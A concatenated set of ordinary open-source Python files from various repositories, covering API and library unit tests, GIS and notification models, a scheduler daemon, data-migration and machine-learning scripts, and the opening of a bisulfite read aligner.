def test_call_specimen_data_researchers(self):
researchers = 'Thibaud Decaens'
res = bold.call_specimen_data(researchers=researchers)
collection_event_countries = []
append = collection_event_countries.append
for item in res.items:
if 'collection_event_country' in item:
append(item['collection_event_country'])
self.assertTrue('Peru' in collection_event_countries)
def test_call_specimen_data_geo(self):
geo = 'Iceland'
res = bold.call_specimen_data(geo=geo)
collection_event_countries = []
append = collection_event_countries.append
for item in res.items:
if 'collection_event_country' in item:
append(item['collection_event_country'])
self.assertTrue('Iceland' in collection_event_countries)
def test_call_specimen_data_format_tsv(self):
geo = 'Iceland'
res = bold.call_specimen_data(geo=geo, format='tsv')
self.assertTrue('Iceland' in res.items)
def test_call_specimen_data_wrong_format(self):
geo = 'Iceland'
self.assertRaises(ValueError, bold.call_specimen_data, geo=geo, format='csv')
def test_call_specimen_data_return_empty(self):
geo = 'Fake country name'
self.assertRaises(ValueError, bold.call_specimen_data, geo=geo)
def test_call_taxon_data_basic(self):
tax_id = 302603
# using default datatype='basic'
res = bold.call_taxon_data(tax_id, data_type='basic')
item = res.items[0]
self.assertEqual(7044, item['parent_id'])
def test_call_taxon_data_basic_empty(self):
tax_id = 302603
res = bold.call_taxon_data(tax_id)
item = res.items[0]
self.assertEqual(7044, item['parent_id'])
def test_call_taxon_data_includetree_false(self):
tax_id = 302603
# using default datatype='basic'
res = bold.call_taxon_data(tax_id, data_type='basic', include_tree=False)
item = res.items[0]
self.assertEqual(7044, item['parent_id'])
def test_call_taxon_data_includetree_true(self):
tax_id = 302603
# using default datatype='basic'
res = bold.call_taxon_data(tax_id, data_type='basic', include_tree=True)
self.assertEqual(7, len(res.items))
def test_call_taxon_data_includetree_error(self):
tax_id = 302603
# using default datatype='basic'
self.assertRaises(ValueError, bold.call_taxon_data, (tax_id, 'basic', 'true'))
def test_call_sequence_data(self):
taxon = 'Hermeuptychia'
geo = 'Peru'
res = bold.call_sequence_data(taxon=taxon, geo=geo)
items = res.items
seq_record_ids = [item.id for item in items]
self.assertTrue('GBLN4477-14|Hermeuptychia' in seq_record_ids)
def test_call_sequence_data_returns_empty(self):
taxon = 'Fake taxon'
geo = 'Fake country'
self.assertRaises(ValueError, bold.call_sequence_data, taxon, geo)
def test_call_full_data(self):
taxon = 'Hermeuptychia'
geo = 'Peru'
res = bold.call_full_data(taxon=taxon, geo=geo)
genbank_accession_numbers = [item['specimen_identifiers_sample_id'] for item in res.items]
self.assertTrue('KF466142' in genbank_accession_numbers)
def test_call_full_data_invalid(self):
geo = 'Peru'
format = 'csv'
self.assertRaises(ValueError, bold.call_full_data, geo=geo, format=format)
def test_call_trace_files(self):
taxon = 'Euptychia mollis'
institutions = 'York University'
res = bold.call_trace_files(taxon=taxon,
institutions=institutions)
self.assertNotEqual(res.file_contents, None)
def test_parse_json(self):
res = api.Response()
# call_taxon_search
json_string = '{"302603":{"taxid":302603,"taxon":"Euptychia ordinata","tax_rank":"species","tax_division":"Animals","parentid":7044,"parentname":"Euptychia"}}'
res._parse_json(json_string)
item = res.items[0]
self.assertEqual(302603, item['tax_id'])
self.assertEqual(7044, item['parent_id'])
# data_type = basic
json_string = '{"taxid":891,"taxon":"Fabaceae","tax_rank":"family","tax_division":"Plants","parentid":187,"parentname":"Fabales","taxonrep":"Fabaceae"}'
res._parse_json(json_string)
item = res.items[0]
self.assertEqual('Fabaceae', item['taxon'])
self.assertEqual('Plants', item['tax_division'])
# data_type = images
json_string = '{"images":[{"copyright_institution":"Smithsonian Tropical Research Institute","specimenid":2616716,"copyright":"Matthew J. MIller","imagequality":4,"photographer":"Oscar Lopez","image":"BSPBB\/MJM_7364_IMG_2240_d+1345758620.JPG","fieldnum":"MJM 7364","sampleid":"MJM 7364","mam_uri":null,"copyright_license":"CreativeCommons - Attribution Non-Commercial","meta":"Dorsal","copyright_holder":"Matthew J. MIller","catalognum":"","copyright_contact":"[email protected]","copyright_year":"2012","taxonrep":"Momotus momota","aspectratio":1.608,"original":true,"external":null}]}'
res._parse_json(json_string)
item = res.items[0]
self.assertEqual('Oscar Lopez', item['images'][0]['photographer'])
# data_type = geo
json_string = '{"country":{"Brazil":3,"Mexico":2,"Panama":10,"Guatemala":1,"Peru":13,"Bolivia":6,"Ecuador":2},"sitemap":"http:\/\/www.boldsystems.org\/index.php\/TaxBrowser_Maps_CollectionSites?taxid=88899"}'
res._parse_json(json_string)
item = res.items[0]
self.assertTrue('Brazil' in item['country'].keys())
# data_type = stats
json_string = '{"stats":{"publicspecies":2,"publicbins":3,"publicmarkersequences":{"COI-5P":6},"publicrecords":6,"specimenrecords":"45","sequencedspecimens":"25","barcodespecimens":"22","species":"3","barcodespecies":"3"}}'
res._parse_json(json_string)
item = res.items[0]
self.assertTrue('publicspecies' in item['stats'].keys())
# data_type = sequencinlabs
json_string = '{"sequencinglabs":{"Smithsonian Tropical Research Institute":7,"Biodiversity Institute of Ontario":13,"Universidade Federal de Minas Gerais":1,"Mined from GenBank":2,"Royal Ontario Museum":2}}'
res._parse_json(json_string)
item = res.items[0]
self.assertTrue('Royal Ontario Museum' in item['sequencinglabs'].keys())
# data_type = thirdparty
json_string = r'{"taxid": 88899, "taxon": "Momotus", "tax_rank": "genus", "tax_division": "Animals", "parentid": 88898, "parentname": "Momotidae", "wikipedia_summary": "Momotus</b></i> is a small genus of the motmots, a family of near passerine birds found in forest and woodland of the Neotropics. They have a colourful plumage, which is green on the back becoming blue on the flight feathers and the long tails. The barbs near the ends of the two longest central tail feathers fall off, leaving a length of bare shaft so that tails appear racket-shaped. \n\nMomotus</i> species, like other motmots, eat small prey such as insects and lizards, and will also take fruit. They nest in tunnels in banks, laying about four white eggs.", "wikipedia_link": "http://en.wikipedia.org/wiki/Momotus", "gbif_map": "http://data.gbif.org/species/2475289/overviewMap.png"}'
res._parse_json(json_string)
item = res.items[0]
self.assertTrue('wikipedia_summary' in item.keys())
def test_parse_data_empty(self):
result_string = ''
response = api.Response()
self.assertRaises(ValueError, response._parse_data, 'call_id', result_string)
def tearDown(self):
pass
if __name__ == '__main__':
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
|
Shaswat27/sympy | refs/heads/master | sympy/combinatorics/tests/test_group_constructs.py | 129 | from sympy.combinatorics.group_constructs import DirectProduct
from sympy.combinatorics.named_groups import CyclicGroup, DihedralGroup
def test_direct_product_n():
C = CyclicGroup(4)
D = DihedralGroup(4)
G = DirectProduct(C, C, C)
assert G.order() == 64
assert G.degree == 12
assert len(G.orbits()) == 3
assert G.is_abelian is True
H = DirectProduct(D, C)
assert H.order() == 32
assert H.is_abelian is False
|
ibc/MediaSoup | refs/heads/v3 | worker/deps/gyp/test/mac/gyptest-unicode-settings.py | 246 | #!/usr/bin/env python
# Copyright 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that unicode strings in 'xcode_settings' work.
Also checks that ASCII control characters are escaped properly.
"""
import TestGyp
import sys
if sys.platform == 'darwin':
test = TestGyp.TestGyp(formats=['xcode'])
test.run_gyp('test.gyp', chdir='unicode-settings')
test.build('test.gyp', test.ALL, chdir='unicode-settings')
test.pass_test()
|
barbuza/django | refs/heads/master | tests/gis_tests/geoapp/sitemaps.py | 452 | from django.contrib.gis.sitemaps import KMLSitemap, KMZSitemap
from .models import City, Country
sitemaps = {'kml': KMLSitemap([City, Country]),
'kmz': KMZSitemap([City, Country]),
}
|
LeaWolf2/Lea | refs/heads/master | py/openage/convert/fix_data.py | 46 | # data fixing script
#
# as you can imagine, the data entries may contain some semi-correct
# values, which we need to adapt. this is done in this file.
def fix_data(data):
"""
updates given input with modifications.
input: empiresdat object, vanilla, fully read.
output: empiresdat object, fixed.
"""
###
# Terrain fixes
###
#remove terrains with slp_id == -1
#we'll need them again in the future, with fixed slp ids
slp_ge0 = lambda x: x.slp_id >= 0
data.terrains = list(filter(slp_ge0, data.terrains))
#assign correct blending modes
#key: dat file stored mode
#value: corrected mode
#resulting values are also priorities!
# -> higher => gets selected as mask for two partners
blendmode_map = {
#identical modes: [0,1,7,8], [4,6]
0: 1, #dirt, grass, palm_desert
1: 3, #farms
2: 2, #beach
3: 0, #water
4: 1, #shallows
5: 4, #roads
6: 5, #ice
7: 6, #snow
8: 4, #no terrain has it, but the mode exists..
}
for terrain in data.terrains:
terrain.blend_mode = blendmode_map[terrain.blend_mode]
#set correct terrain ids
for idx, terrain in enumerate(data.terrains):
terrain.terrain_id = idx
return data
|
adeepkit01/networks | refs/heads/master | utils/python-unit-tests.py | 155 | import unittest
from ns.core import Simulator, Seconds, Config, int64x64_t
import ns.core
import ns.network
import ns.internet
import ns.mobility
import ns.csma
import ns.applications
class TestSimulator(unittest.TestCase):
def testScheduleNow(self):
def callback(args):
self._args_received = args
self._cb_time = Simulator.Now()
Simulator.Destroy()
self._args_received = None
self._cb_time = None
Simulator.ScheduleNow(callback, "args")
Simulator.Run()
self.assertEqual(self._args_received, "args")
self.assertEqual(self._cb_time.GetSeconds(), 0.0)
def testSchedule(self):
def callback(args):
self._args_received = args
self._cb_time = Simulator.Now()
Simulator.Destroy()
self._args_received = None
self._cb_time = None
Simulator.Schedule(Seconds(123), callback, "args")
Simulator.Run()
self.assertEqual(self._args_received, "args")
self.assertEqual(self._cb_time.GetSeconds(), 123.0)
def testScheduleDestroy(self):
def callback(args):
self._args_received = args
self._cb_time = Simulator.Now()
Simulator.Destroy()
self._args_received = None
self._cb_time = None
def null(): pass
Simulator.Schedule(Seconds(123), null)
Simulator.ScheduleDestroy(callback, "args")
Simulator.Run()
Simulator.Destroy()
self.assertEqual(self._args_received, "args")
self.assertEqual(self._cb_time.GetSeconds(), 123.0)
def testScheduleWithContext(self):
def callback(context, args):
self._context_received = context
self._args_received = args
self._cb_time = Simulator.Now()
Simulator.Destroy()
self._args_received = None
self._cb_time = None
self._context_received = None
Simulator.ScheduleWithContext(54321, Seconds(123), callback, "args")
Simulator.Run()
self.assertEqual(self._context_received, 54321)
self.assertEqual(self._args_received, "args")
self.assertEqual(self._cb_time.GetSeconds(), 123.0)
def testTimeComparison(self):
self.assert_(Seconds(123) == Seconds(123))
self.assert_(Seconds(123) >= Seconds(123))
self.assert_(Seconds(123) <= Seconds(123))
self.assert_(Seconds(124) > Seconds(123))
self.assert_(Seconds(123) < Seconds(124))
def testTimeNumericOperations(self):
self.assertEqual(Seconds(10) + Seconds(5), Seconds(15))
self.assertEqual(Seconds(10) - Seconds(5), Seconds(5))
v1 = int64x64_t(5.0)*int64x64_t(10)
self.assertEqual(v1, int64x64_t(50))
def testConfig(self):
Config.SetDefault("ns3::OnOffApplication::PacketSize", ns.core.UintegerValue(123))
# hm.. no Config.Get?
def testSocket(self):
node = ns.network.Node()
internet = ns.internet.InternetStackHelper()
internet.Install(node)
self._received_packet = None
def rx_callback(socket):
assert self._received_packet is None
self._received_packet = socket.Recv()
sink = ns.network.Socket.CreateSocket(node, ns.core.TypeId.LookupByName("ns3::UdpSocketFactory"))
sink.Bind(ns.network.InetSocketAddress(ns.network.Ipv4Address.GetAny(), 80))
sink.SetRecvCallback(rx_callback)
source = ns.network.Socket.CreateSocket(node, ns.core.TypeId.LookupByName("ns3::UdpSocketFactory"))
source.SendTo(ns.network.Packet(19), 0, ns.network.InetSocketAddress(ns.network.Ipv4Address("127.0.0.1"), 80))
Simulator.Run()
self.assert_(self._received_packet is not None)
self.assertEqual(self._received_packet.GetSize(), 19)
def testAttributes(self):
##
## Yes, I know, the GetAttribute interface for Python is
## horrible, we should fix this soon, I hope.
##
queue = ns.network.DropTailQueue()
queue.SetAttribute("MaxPackets", ns.core.UintegerValue(123456))
limit = ns.core.UintegerValue()
queue.GetAttribute("MaxPackets", limit)
self.assertEqual(limit.Get(), 123456)
## -- object pointer values
mobility = ns.mobility.RandomWaypointMobilityModel()
ptr = ns.core.PointerValue()
mobility.GetAttribute("PositionAllocator", ptr)
self.assertEqual(ptr.GetObject(), None)
pos = ns.mobility.ListPositionAllocator()
mobility.SetAttribute("PositionAllocator", ns.core.PointerValue(pos))
ptr = ns.core.PointerValue()
mobility.GetAttribute("PositionAllocator", ptr)
self.assert_(ptr.GetObject() is not None)
def testIdentity(self):
csma = ns.csma.CsmaNetDevice()
channel = ns.csma.CsmaChannel()
csma.Attach(channel)
c1 = csma.GetChannel()
c2 = csma.GetChannel()
self.assert_(c1 is c2)
def testTypeId(self):
typeId1 = ns.core.TypeId.LookupByNameFailSafe("ns3::UdpSocketFactory")
self.assertEqual(typeId1.GetName (), "ns3::UdpSocketFactory")
self.assertRaises(KeyError, ns.core.TypeId.LookupByNameFailSafe, "__InvalidTypeName__")
def testCommandLine(self):
cmd = ns.core.CommandLine()
cmd.AddValue("Test1", "this is a test option")
cmd.AddValue("Test2", "this is a test option")
cmd.AddValue("Test3", "this is a test option", variable="test_xxx")
cmd.Test1 = None
cmd.Test2 = None
cmd.test_xxx = None
class Foo:
pass
foo = Foo()
foo.test_foo = None
cmd.AddValue("Test4", "this is a test option", variable="test_foo", namespace=foo)
cmd.Parse(["python", "--Test1=value1", "--Test2=value2", "--Test3=123", "--Test4=xpto"])
self.assertEqual(cmd.Test1, "value1")
self.assertEqual(cmd.Test2, "value2")
self.assertEqual(cmd.test_xxx, "123")
self.assertEqual(foo.test_foo, "xpto")
def testSubclass(self):
class MyNode(ns.network.Node):
def __init__(self):
super(MyNode, self).__init__()
node = MyNode()
if __name__ == '__main__':
unittest.main()
|
commtrack/commtrack-core | refs/heads/master | utilities/data_migration/reporter_upgrade.py | 5 | None
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import os
from django.utils import simplejson
def run():
print "starting"
from hq.models import ExtUser, ReporterProfile
from reporters.models import Reporter, PersistantBackend, PersistantConnection
all_users = ExtUser.objects.all()
for user in all_users:
print "processing user %s" % user
rep = user.reporter
if rep:
print "%s already has attached reporter object! %s" % (user, reporter)
else:
rep = Reporter()
# if they have a first and last name set, use those,
# otherwise just use the login
if user.first_name and user.last_name:
alias, fn, ln = Reporter.parse_name("%s %s" % (user.first_name, user.last_name))
else:
alias, fn, ln = Reporter.parse_name(user.username)
print "Chose alias: %s first last: %s %s" % (alias, fn, ln)
rep.first_name = fn
rep.last_name = ln
rep.alias = alias
rep.save()
profile = ReporterProfile()
profile.reporter = rep
profile.chw_id = user.chw_id
profile.chw_username = user.chw_username
profile.domain = user.domain
profile.save()
print "Saved profile %s for %s" % (profile, user)
if user.primary_phone:
# create a backend / connection for them. This is
# still a little hazy as it's not clear how the
# backend is properly chosen
# this will create an arbitrary backend if none is
# found
if len(PersistantBackend.objects.all()) == 0:
PersistantBackend.objects.create(slug="data_migration",
title="Data Migration Backend")
backend = PersistantBackend.objects.all()[0]
try:
conn = PersistantConnection.objects.create(backend=backend,
identity=user.primary_phone,
reporter=rep)
print "created connection %s for %s" % (conn, user)
except Exception, e:
print "Error creating connection for %s for number %s. Is it possible you have duplicate phone numbers?" % (user, user.primary_phone)
print "done"
|
bowenliu16/deepchem | refs/heads/master | examples/gdb7/gdb7_tf.py | 1 | """
Script that trains Tensorflow singletask models on GDB7 dataset.
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import os
import deepchem as dc
import numpy as np
import shutil
from sklearn.kernel_ridge import KernelRidge
np.random.seed(123)
base_dir = "/tmp/gdb7_sklearn"
data_dir = os.path.join(base_dir, "dataset")
model_dir = os.path.join(base_dir, "model")
train_dir = os.path.join(base_dir, "train")
test_dir = os.path.join(base_dir, "test")
if os.path.exists(base_dir):
shutil.rmtree(base_dir)
os.makedirs(base_dir)
max_num_atoms = 23
featurizers = dc.feat.CoulombMatrixEig(max_num_atoms)
input_file = "gdb7.sdf"
tasks = ["u0_atom"]
smiles_field = "smiles"
mol_field = "mol"
featurizer = dc.data.SDFLoader(tasks, smiles_field=smiles_field, mol_field=mol_field, featurizer=featurizers)
dataset = featurizer.featurize(input_file, data_dir)
random_splitter = dc.splits.RandomSplitter()
train_dataset, test_dataset = random_splitter.train_test_split(dataset, train_dir, test_dir)
transformers = [dc.trans.NormalizationTransformer(transform_X=True, dataset=train_dataset), dc.trans.NormalizationTransformer(transform_y=True, dataset=train_dataset)]
for transformer in transformers:
train_dataset = transformer.transform(train_dataset)
for transformer in transformers:
test_dataset = transformer.transform(test_dataset)
regression_metric = dc.metrics.Metric(dc.metrics.mean_absolute_error, mode="regression")
model = dc.models.TensorflowMultiTaskRegressor(n_tasks=len(tasks), n_features=23, logdir=model_dir,
learning_rate=.001, momentum=.8, batch_size=512,
weight_init_stddevs=[1/np.sqrt(2000),1/np.sqrt(800),1/np.sqrt(800),1/np.sqrt(1000)],
bias_init_consts=[0.,0.,0.,0.], layer_sizes=[2000,800,800,1000],
dropouts=[0.1,0.1,0.1,0.1])
# Fit trained model
model.fit(train_dataset)
model.save()
train_evaluator = dc.utils.evaluate.Evaluator(model, train_dataset, transformers)
train_scores = train_evaluator.compute_model_performance([regression_metric])
print("Train scores [kcal/mol]")
print(train_scores)
test_evaluator = dc.utils.evaluate.Evaluator(model, test_dataset, transformers)
test_scores = test_evaluator.compute_model_performance([regression_metric])
print("Validation scores [kcal/mol]")
print(test_scores)
|
t-hey/QGIS-Original | refs/heads/master | python/plugins/MetaSearch/dialogs/newconnectiondialog.py | 28 | # -*- coding: utf-8 -*-
###############################################################################
#
# CSW Client
# ---------------------------------------------------------
# QGIS Catalog Service client.
#
# Copyright (C) 2010 NextGIS (http://nextgis.org),
# Alexander Bruy ([email protected]),
# Maxim Dubinin ([email protected])
#
# Copyright (C) 2017 Tom Kralidis ([email protected])
#
# This source is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# This code is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
###############################################################################
from qgis.core import QgsSettings
from qgis.PyQt.QtWidgets import QDialog, QMessageBox
from MetaSearch.util import get_ui_class
BASE_CLASS = get_ui_class('newconnectiondialog.ui')
class NewConnectionDialog(QDialog, BASE_CLASS):
"""Dialogue to add a new CSW entry"""
def __init__(self, conn_name=None):
"""init"""
QDialog.__init__(self)
self.setupUi(self)
self.settings = QgsSettings()
self.conn_name = None
self.conn_name_orig = conn_name
self.username = None
self.password = None
def accept(self):
"""add CSW entry"""
conn_name = self.leName.text().strip()
conn_url = self.leURL.text().strip()
conn_username = self.leUsername.text().strip()
conn_password = self.lePassword.text().strip()
if any([conn_name == '', conn_url == '']):
QMessageBox.warning(self, self.tr('Save Connection'),
self.tr('Both Name and URL must be provided.'))
return
if '/' in conn_name:
QMessageBox.warning(self, self.tr('Save Connection'),
self.tr('Name cannot contain \'/\'.'))
return
if conn_name is not None:
key = '/MetaSearch/%s' % conn_name
keyurl = '%s/url' % key
key_orig = '/MetaSearch/%s' % self.conn_name_orig
# warn if entry was renamed to an existing connection
if all([self.conn_name_orig != conn_name,
self.settings.contains(keyurl)]):
res = QMessageBox.warning(self, self.tr('Save Connection'),
self.tr('Overwrite {0}?').format(conn_name),
QMessageBox.Ok | QMessageBox.Cancel)
if res == QMessageBox.Cancel:
return
# on rename delete original entry first
if all([self.conn_name_orig is not None,
self.conn_name_orig != conn_name]):
self.settings.remove(key_orig)
self.settings.setValue(keyurl, conn_url)
self.settings.setValue('/MetaSearch/selected', conn_name)
if conn_username != '':
self.settings.setValue('%s/username' % key, conn_username)
if conn_password != '':
self.settings.setValue('%s/password' % key, conn_password)
QDialog.accept(self)
def reject(self):
"""back out of dialogue"""
QDialog.reject(self)
|
plamut/ggrc-core | refs/heads/develop | src/ggrc/models/notification.py | 6 | # Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""GGRC notification SQLAlchemy layer data model extensions."""
from sqlalchemy.orm import backref
from ggrc import db
from ggrc.models.mixins import Base
from ggrc.models import utils
class NotificationConfig(Base, db.Model):
__tablename__ = 'notification_configs'
name = db.Column(db.String, nullable=True)
enable_flag = db.Column(db.Boolean)
notif_type = db.Column(db.String)
person_id = db.Column(db.Integer, db.ForeignKey('people.id'), nullable=False)
person = db.relationship(
'Person',
backref=backref('notification_configs', cascade='all, delete-orphan'))
_publish_attrs = [
'person_id',
'notif_type',
'enable_flag',
]
VALID_TYPES = [
'Email_Now',
'Email_Digest',
'Calendar',
]
class NotificationType(Base, db.Model):
__tablename__ = 'notification_types'
name = db.Column(db.String, nullable=False)
description = db.Column(db.String, nullable=True)
advance_notice = db.Column(db.DateTime, nullable=True)
template = db.Column(db.String, nullable=True)
instant = db.Column(db.Boolean, nullable=False, default=False)
class Notification(Base, db.Model):
__tablename__ = 'notifications'
object_id = db.Column(db.Integer, nullable=False)
object_type = db.Column(db.String, nullable=False)
send_on = db.Column(db.DateTime, nullable=False)
sent_at = db.Column(db.DateTime, nullable=True)
custom_message = db.Column(db.Text, nullable=True)
force_notifications = db.Column(db.Boolean, default=False, nullable=False)
notification_type_id = db.Column(
db.Integer, db.ForeignKey('notification_types.id'), nullable=False)
notification_type = db.relationship(
'NotificationType', foreign_keys='Notification.notification_type_id')
object = utils.PolymorphicRelationship("object_id", "object_type",
"{}_notifiable")
|
WQuanfeng/bootcamp | refs/heads/master | bootcamp/activities/tests.py | 24123 | from django.test import TestCase
# Create your tests here.
|
mkrupcale/ansible | refs/heads/devel | lib/ansible/modules/utilities/helper/_fireball.py | 12 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['deprecated'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: fireball
short_description: Enable fireball mode on remote node
version_added: "0.9"
deprecated: "in favor of SSH with ControlPersist"
description:
- Modern SSH clients support ControlPersist which is just as fast as
fireball was. Please enable that in ansible.cfg as a replacement
for fireball.
- Removed in ansible 2.0.
author:
- "Ansible Core Team"
- "Michael DeHaan"
'''
EXAMPLES = '''
'''
|
plastboks/Pulpy | refs/heads/develop | pulpy/views/__init__.py | 1 | # views
from pulpy.views.main import MainViews
from pulpy.views.auth import AuthViews
from pulpy.views.account import AccountViews
from pulpy.views.note import NoteViews
|
sungpil/bigshow | refs/heads/master | com/sundaytoz/bigshow/schedule.py | 1 | import logging
from daemonize import Daemonize
import time
from com.sundaytoz import bigshow
import pymysql.cursors
from pymysql.converters import conversions, through
from pymysql.constants import FIELD_TYPE
from datetime import datetime
pid = "/tmp/com.sundaytoz.schedule.pid"
formatter = logging.Formatter(fmt='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
logger.propagate = False
fh = logging.FileHandler("/tmp/com.sundaytoz.schedule.log", "a")
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
logger.addHandler(fh)
keep_fds = [fh.stream.fileno()]
def main():
while True:
check_schedule()
time.sleep(60)
def check_schedule():
now = datetime.now()
time_minute = now.minute
time_hour = now.hour
time_month = now.month
time_day = now.day
time_date = now.weekday()
sql = "SELECT * FROM schedules WHERE " \
"(time_minute={minute} and time_hour<0 and time_day<0 and time_month<0 and time_date<0)" \
"OR (time_minute={minute} and time_hour={hour} and time_day<0 and time_month<0 and time_date<0) " \
"OR (time_minute={minute} and time_hour={hour} and time_day={day} and time_month<0 and time_date<0) " \
"OR (time_minute={minute} and time_hour={hour} and time_day={day} and time_month={month} and time_date<0) " \
"OR (time_minute={minute} and time_hour={hour} and time_day<0 and time_month<0 and time_date={date}) "\
.format(minute=time_minute, hour=time_hour, day=time_day, month=time_month, date=time_date)
connection = get_db()
try:
with connection.cursor() as cursor:
cursor.execute(sql)
schedules = cursor.fetchall()
if schedules:
for schedule in schedules:
chart_id = "schedule-{schedule_id}".format(schedule_id=schedule['id'])
results, error = bigshow.Chart.query_sync(chart_id=chart_id,
resource=schedule['resource'],
query_type=schedule['query_type'],
query=schedule['query'],
query_params=schedule['query_params'])
logger.debug("{schedule_id} : error={error}".format(time=datetime.now().strftime("%y%m%d %H%M%S"), schedule_id=schedule['id'], error={error}))
finally:
connection.close()
def get_db():
conversions[FIELD_TYPE.TIMESTAMP] = through
from config.dev import config
db_config = config['db']['default']
return pymysql.connect(host=db_config["host"],
user=db_config["user"],
password=db_config["password"],
db=db_config["db"],
charset=db_config["charset"],
cursorclass=pymysql.cursors.DictCursor,
conv=conversions)
daemon = Daemonize(app="schedule", pid=pid, action=main, keep_fds=keep_fds, logger=logger)
daemon.start()
|
omwomotieno/tunza_v3 | refs/heads/work_branch | register/admin.py | 1 | from django.contrib import admin
from .models import Patient, Discharge
from .forms import PatientForm, DischargeForm # WeightForm, BPForm, NoteForm, WeekForm, SignUpForm
class PatientAdmin(admin.ModelAdmin):
list_display = ('anc_number', 'patient_name', 'last_menstrual_date', 'patient_contact',)
list_display_links = ('patient_name',)
list_editable = ('patient_contact',)
list_per_page = (6)
search_fields = ('patient_name', 'anc_number',)
form = PatientForm
admin.site.register(Patient, PatientAdmin)
class DischargeAdmin(admin.ModelAdmin):
list_display = ('discharged','patient',)
list_display_links = ('patient',)
form = DischargeForm
admin.site.register(Discharge, DischargeAdmin )
|
BioInfoTools/BSVF | refs/heads/master | bin/BSseeker2/bs_align/bs_single_end.py | 1 | import fileinput, os, time, random, math
from bs_utils.utils import *
from bs_align_utils import *
import gzip
#----------------------------------------------------------------
# Read from the mapped results, return lists of unique / multiple-hit reads
# The function suppose at most 2 hits will be reported in single file
def extract_mapping(ali_file):
unique_hits = {}
non_unique_hits = {}
header0 = ""
lst = []
for header, chr, location, no_mismatch, cigar in process_aligner_output(ali_file):
#------------------------------
if header != header0:
#---------- output -----------
if len(lst) == 1:
unique_hits[header0] = lst[0] # [no_mismatch, chr, location]
elif len(lst) > 1:
min_lst = min(lst, key = lambda x: x[0])
max_lst = max(lst, key = lambda x: x[0])
if min_lst[0] < max_lst[0]:
unique_hits[header0] = min_lst
else:
non_unique_hits[header0] = min_lst[0]
#print "multiple hit", header, chr, location, no_mismatch, cigar # test
header0 = header
lst = [(no_mismatch, chr, location, cigar)]
else: # header == header0, same header (read id)
lst.append((no_mismatch, chr, location, cigar))
if len(lst) == 1:
unique_hits[header0] = lst[0] # [no_mismatch, chr, location]
elif len(lst) > 1:
min_lst = min(lst, key = lambda x: x[0])
max_lst = max(lst, key = lambda x: x[0])
if min_lst[0] < max_lst[0]:
unique_hits[header0] = min_lst
else:
non_unique_hits[header0] = min_lst[0]
return unique_hits, non_unique_hits
def bs_single_end(main_read_file, asktag, adapter_file, cut1, cut2, no_small_lines,
max_mismatch_no, aligner_command, db_path, tmp_path, outfile,
XS_pct, XS_count, adapter_mismatch, show_multiple_hit, show_unmapped_hit):
logm("----------------------------------------------" )
logm("Read filename: %s" % main_read_file)
logm("The first base (for mapping): %d" % cut1 )
logm("The last base (for mapping): %d" % cut2 )
logm("Path for short reads aligner: %s" % aligner_command + '\n')
logm("Reference genome library path: %s" % db_path )
if asktag == "Y" :
logm("Un-directional library" )
else :
logm("Directional library")
# end-of-if
logm("Number of mismatches allowed: %s" % str(max_mismatch_no) )
# adapter : strand-specific or not
adapter = ""
adapter_fw = ""
adapter_rc = ""
if adapter_file != "":
try :
adapter_inf = open(adapter_file, "r")
if asktag == "N": #<--- directional library
adapter = adapter_inf.readline()
adapter_inf.close()
adapter = adapter.rstrip("\n")[0:10]
elif asktag == "Y":#<--- un-directional library
adapter_fw = adapter_inf.readline()
adapter_rc = adapter_inf.readline()
adapter_inf.close()
adapter_fw = adapter_fw.rstrip("\n")[0:10]
adapter_rc = adapter_rc.rstrip("\n")[-10::]
if adapter_rc == "" :
adapter_rc = reverse_compl_seq(adapter_fw)
adapter_inf.close()
except IOError:
print "[Error] Cannot open adapter file : %s" % adapter_file
exit(-1)
if adapter_file != "":
if asktag == "N": #<--- directional library
logm("Adapter sequence: %s" % adapter)
elif asktag == "Y":
logm("3\' end adapter sequence: %s" % adapter_fw)
logm("5\' end adapter sequence: %s" % adapter_rc)
logm("-------------------------------- " )
# helper method to join fname with tmp_path
tmp_d = lambda fname: os.path.join(tmp_path, fname)
db_d = lambda fname: os.path.join(db_path, fname)
# splitting the big read file
input_fname = os.path.split(main_read_file)[1]
#---- Stats ------------------------------------------------------------
all_raw_reads = 0
all_trimmed = 0
all_mapped = 0
all_mapped_passed = 0
all_base_before_trim = 0
all_base_after_trim = 0
all_base_mapped = 0
numbers_premapped_lst = [0, 0, 0, 0]
numbers_mapped_lst = [0, 0, 0, 0]
mC_lst = [0, 0, 0]
uC_lst = [0, 0, 0]
no_my_files = 0
#----------------------------------------------------------------
if show_multiple_hit is not None:
outf_MH=open(show_multiple_hit,'w')
if show_unmapped_hit is not None :
outf_UH=open(show_unmapped_hit,'w')
for read_file in isplit_file(main_read_file, tmp_d(input_fname)+'-s-', no_small_lines):
# for read_file in my_files:
original_bs_reads = {}
no_my_files+=1
random_id = ".tmp-"+str(random.randint(1000000, 9999999))
